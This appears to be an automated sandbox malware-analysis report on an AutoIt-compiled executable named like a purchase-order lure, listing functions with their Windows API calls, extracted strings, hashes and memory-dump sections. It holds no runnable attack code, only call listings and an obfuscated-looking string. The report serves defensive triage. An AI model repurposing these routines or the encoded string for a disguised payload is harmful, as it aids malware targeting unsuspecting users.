SetTextColor.GDI32(?,00000000), ref: 0046D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0046D712
SelectObject.GDI32(?,0046D2A5), ref: 0046D729
DeleteObject.GDI32(?), ref: 0046D734
SelectObject.GDI32(?,?), ref: 0046D73A
DeleteObject.GDI32(?), ref: 0046D73F
SetTextColor.GDI32(?,?), ref: 0046D745
SetBkColor.GDI32(?,?), ref: 0046D74F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c43565668126191cd8f2392aa243306caff2100be95ff8e1f24bf8bdd047f677
Instruction ID: 2e03f9327eeab2d40ca4f816ed687680e735fa5ad21fcb0366a83fd56a694508
Opcode Fuzzy Hash: c43565668126191cd8f2392aa243306caff2100be95ff8e1f24bf8bdd047f677
Instruction Fuzzy Hash: C8512A71D01218BFDF10AFA8DC48EAE7BB9EF08324F10452AF915AB2E1D7759A409F54

Function 0046B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0046B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B7C1
CharNextW.USER32(0000014E), ref: 0046B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0046B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0046B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0046B875
SetWindowTextW.USER32(?,0000014E), ref: 0046B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0046B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046B90E
_memset.LIBCMT ref: 0046B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0046B97C
_memset.LIBCMT ref: 0046B9DB
SendMessageW.USER32 ref: 0046BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0046BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0046BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0046BB2C
GetMenuItemInfoW.USER32(?), ref: 0046BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046BBA3
DrawMenuBar.USER32(?), ref: 0046BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0046BBDA

Strings

0, xrefs: 0046BB4F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 1f2fedc8b8249f8d7d8d174c884dee1b2224e4b6ae731d9412bffa098fcaa608
Instruction ID: 105667823e2cecf89bff1c6361f5e2b3764f8dc26707848e41da29b8269f068d
Opcode Fuzzy Hash: 1f2fedc8b8249f8d7d8d174c884dee1b2224e4b6ae731d9412bffa098fcaa608
Instruction Fuzzy Hash: CAE191B4900218ABDB109F55CC84EEF7B78EF05714F10816BF915EA291E7789981CFAA

Function 00402EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00402F7A
IsWindow.USER32(?), ref: 004722FD

Strings

REGEXPTITLE, xrefs: 004720F8
ALL, xrefs: 00472264
TITLE, xrefs: 00472292
L+K, xrefs: 004721B2
H+K, xrefs: 00472184
HANDLE, xrefs: 004720E2
CLASS, xrefs: 00472128
P+K, xrefs: 004721E0
ACTIVE, xrefs: 004720CC
T+K, xrefs: 0047220E
INSTANCE, xrefs: 0047223C
LAST, xrefs: 004720B6
REGEXPCLASS, xrefs: 00472149

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+K$HANDLE$INSTANCE$L+K$LAST$P+K$REGEXPCLASS$REGEXPTITLE$T+K$TITLE
API String ID: 62970417-967414542
Opcode ID: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
Instruction ID: 19b6f70e54dbd00de2fe89bce1193ca9c500e92799cd443801b945e85138c81e
Opcode Fuzzy Hash: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
Instruction Fuzzy Hash: 29D1B9305086439BCB04DF21CA419DABBA4FF54344F00892FF459671E2DB78E99ADBD9

Function 0046764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0046778A
GetDesktopWindow.USER32 ref: 0046779F
GetWindowRect.USER32(00000000), ref: 004677A6
GetWindowLongW.USER32(?,000000F0), ref: 00467808
DestroyWindow.USER32(?), ref: 00467834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0046785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004678A1
SendMessageW.USER32(?,00000421,?,?), ref: 004678B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004678C9
IsWindowVisible.USER32(?), ref: 004678E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00467904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00467918
GetWindowRect.USER32(?,?), ref: 00467930
MonitorFromPoint.USER32(?,?,00000002), ref: 00467956
GetMonitorInfoW.USER32 ref: 00467970
CopyRect.USER32(?,?), ref: 00467987
SendMessageW.USER32(?,00000412,00000000), ref: 004679F2

Strings

0, xrefs: 00467735
tooltips_class32, xrefs: 00467856
(, xrefs: 00467965

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
Instruction ID: 6fd286384aed1c985e01992562759e80b587d685e8a57b14d478fdb94f0a8a73
Opcode Fuzzy Hash: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
Instruction Fuzzy Hash: 36B16E71608301AFD704DF65C948B5ABBE5FF88314F00892EF599AB291E774EC05CB9A

Function 00446CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00446CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00446D21
_wcscpy.LIBCMT ref: 00446D4F
_wcscmp.LIBCMT ref: 00446D5A
_wcscat.LIBCMT ref: 00446D70
_wcsstr.LIBCMT ref: 00446D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00446D97
_wcscat.LIBCMT ref: 00446DE0
_wcscat.LIBCMT ref: 00446DE7
_wcsncpy.LIBCMT ref: 00446E12

Strings

\VarFileInfo\Translation, xrefs: 00446D8F
StringFileInfo\, xrefs: 00446D6A
DefaultLangCodepage, xrefs: 00446DFA
%u.%u.%u.%u, xrefs: 00446E75
04090000, xrefs: 00446DCD

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 05c7683b58927b3b4756cbfe02632f1bbbf1e7c5ff07af17dccf1b8176674ae6
Instruction ID: c65ea2cb437959043e01196925574286d70b4e00aee65ea3b02482d26ec9895d
Opcode Fuzzy Hash: 05c7683b58927b3b4756cbfe02632f1bbbf1e7c5ff07af17dccf1b8176674ae6
Instruction Fuzzy Hash: E941F771A04210BBEB04AB66DC47EBF77BCDF51714F10006FF901A2192EA7C9A0596AE

Function 0041A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A939
GetSystemMetrics.USER32(00000007), ref: 0041A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A96C
GetSystemMetrics.USER32(00000008), ref: 0041A974
GetSystemMetrics.USER32(00000004), ref: 0041A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0041A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0041A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0041A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0041AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0041AA2B
GetStockObject.GDI32(00000011), ref: 0041AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041AA52

Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F

SetTimer.USER32(00000000,00000000,00000028,0041AB87), ref: 0041AA79

Strings

qw681qqw621qqw6e1qqw601qqw601qqw601qqw601qqw601qqw601qqw661qqw661qqw681qqw691qqw681qqw651qqw641qqw6e1qqw6f1qqw6f1qqw6f1qqw6f1qqw6f, xrefs: 0047DA91
AutoIt v3 GUI, xrefs: 0041A9F1

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$qw681qqw621qqw6e1qqw601qqw601qqw601qqw601qqw601qqw601qqw661qqw661qqw681qqw691qqw681qqw651qqw641qqw6e1qqw6f1qqw6f1qqw6f1qqw6f1qqw6f
API String ID: 1458621304-3099088099
Opcode ID: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
Instruction ID: 772b70500764f947b2549a3380184186526abbf3af67c980f925d5c2611f14e1
Opcode Fuzzy Hash: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
Instruction Fuzzy Hash: 31B14F71A0120A9FDB14DFA8DC45BEE7BB4FF08314F11422AFA15A62E0D7789891CB59

Function 00463639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00463735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0049DC00,00000000,?,00000000,?,?), ref: 004637A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004637EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00463874
RegCloseKey.ADVAPI32(?), ref: 00463B94
RegCloseKey.ADVAPI32(00000000), ref: 00463BA1

Strings

REG_QWORD, xrefs: 00463AE2
REG_MULTI_SZ, xrefs: 0046395C
REG_DWORD, xrefs: 00463A65
REG_EXPAND_SZ, xrefs: 00463811
REG_SZ, xrefs: 004638B2
REG_BINARY, xrefs: 00463B2F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: cb9e944771819dfb77be2f049b4f10ecd3768c88c39b614e18d19627da589ee7
Instruction ID: 94f16537412128840b1b23fcea22bb683396cf897e5eede4ab9d45138d76c91a
Opcode Fuzzy Hash: cb9e944771819dfb77be2f049b4f10ecd3768c88c39b614e18d19627da589ee7
Instruction Fuzzy Hash: C8026F756006019FCB14DF25C851A1EB7E5FF88714F04846EF9899B3A2DB38ED41CB8A

Function 00466BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00466C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00466D16

Strings

GETSELECTED, xrefs: 00466E3C
VIEWCHANGE, xrefs: 00466ECD
GETSELECTEDCOUNT, xrefs: 00466CF9
SELECTINVERT, xrefs: 00466DDE
SELECTALL, xrefs: 00466D75
ISSELECTED, xrefs: 00466D21
FINDITEM, xrefs: 00466E81
SELECTCLEAR, xrefs: 00466D8D
GETTEXT, xrefs: 00466CBF
GETITEMCOUNT, xrefs: 00466C84
DESELECT, xrefs: 00466DFC
SELECT, xrefs: 00466DA8
GETSUBITEMCOUNT, xrefs: 00466CA1

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 25827ff6fd62e69c30516841602535ae5e4ea737b77c996f837d4cff45305b23
Instruction ID: efac7140647597b4e0a4d800608fbc95c45418c52914f72453b713750b31682f
Opcode Fuzzy Hash: 25827ff6fd62e69c30516841602535ae5e4ea737b77c996f837d4cff45305b23
Instruction Fuzzy Hash: 80A1A7742042419FCB14EF25C951A6BB3A5FF84318F11496FB856673D2EB38EC06CB9A

Function 0043CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0043CF91
__swprintf.LIBCMT ref: 0043D032
_wcscmp.LIBCMT ref: 0043D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0043D09A
_wcscmp.LIBCMT ref: 0043D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0043D10D
GetDlgCtrlID.USER32(?), ref: 0043D15F
GetWindowRect.USER32(?,?), ref: 0043D195
GetParent.USER32(?), ref: 0043D1B3
ScreenToClient.USER32(00000000), ref: 0043D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0043D234
_wcscmp.LIBCMT ref: 0043D248
GetWindowTextW.USER32(?,?,00000400), ref: 0043D26E
_wcscmp.LIBCMT ref: 0043D282

Strings

%s%u, xrefs: 0043D02C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: caa1280b66be122eee60294c142b2acf7174f897f405c9ec7d004c1445a7f129
Instruction ID: 24840aa67b1d37cee4f9ed2b757ca5224d0e7bcabf0401134b637d571f0a2458
Opcode Fuzzy Hash: caa1280b66be122eee60294c142b2acf7174f897f405c9ec7d004c1445a7f129
Instruction Fuzzy Hash: D6A1E271A04306AFD714DF64E884FABB7A8FF48354F00492BF95993290DB38EA45CB95

Function 0043D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0043D8EB
_wcscmp.LIBCMT ref: 0043D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0043D924
CharUpperBuffW.USER32(?,00000000), ref: 0043D941
_wcscmp.LIBCMT ref: 0043D95F
_wcsstr.LIBCMT ref: 0043D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0043D9A8
_wcscmp.LIBCMT ref: 0043D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0043D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0043DA28
_wcscmp.LIBCMT ref: 0043DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0043DA60
GetWindowRect.USER32(00000004,?), ref: 0043DAC9

Strings

@, xrefs: 0043D8C6
ThumbnailClass, xrefs: 0043D9B3, 0043DA33

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f5bafd9e4133a9b11a7385cc68cb9402e281c55fc279b59a9e2d3db0b436475a
Instruction ID: eb4b748b181ce7837a0a3d84f11938d7b11684f0c71fda1ffb2743c464e57e2d
Opcode Fuzzy Hash: f5bafd9e4133a9b11a7385cc68cb9402e281c55fc279b59a9e2d3db0b436475a
Instruction Fuzzy Hash: 9681D2714083059BDB04DF10E981FAB7BA8EF48308F04546FFD899A196DB38ED45CBA9

Function 0043D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0043D753

Strings

ACTIVE, xrefs: 0043D72E
[ALL, xrefs: 0043D7F9
[REGEXPTITLE:, xrefs: 0043D77B
[LAST, xrefs: 0043D800
ALL, xrefs: 0043D7E7
LAST, xrefs: 0043D718
[HANDLE:, xrefs: 0043D75F
REGEXP=, xrefs: 0043D768
CLASSNAME=, xrefs: 0043D790
[ACTIVE, xrefs: 0043D740
[CLASS:, xrefs: 0043D7A3
HANDLE=, xrefs: 0043D74C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
Instruction ID: 668cfd7b102cdb3b06fc8f50abdc480de79f1751c551137aa4085a6d09ebe7cd
Opcode Fuzzy Hash: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
Instruction Fuzzy Hash: C4318F31A44205A6DA18FA61EE53FEE73749F24708F70012FF412710D1EFADBA14866D

Function 0043EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0043EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0043EAC2
SetWindowTextW.USER32(?,?), ref: 0043EAD9
GetDlgItem.USER32(?,000003EA), ref: 0043EAEE
SetWindowTextW.USER32(00000000,?), ref: 0043EAF4
GetDlgItem.USER32(?,000003E9), ref: 0043EB04
SetWindowTextW.USER32(00000000,?), ref: 0043EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0043EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0043EB45
GetWindowRect.USER32(?,?), ref: 0043EB4E
SetWindowTextW.USER32(?,?), ref: 0043EBB9
GetDesktopWindow.USER32 ref: 0043EBBF
GetWindowRect.USER32(00000000), ref: 0043EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0043EC12
GetClientRect.USER32(?,?), ref: 0043EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0043EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0043EC6F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

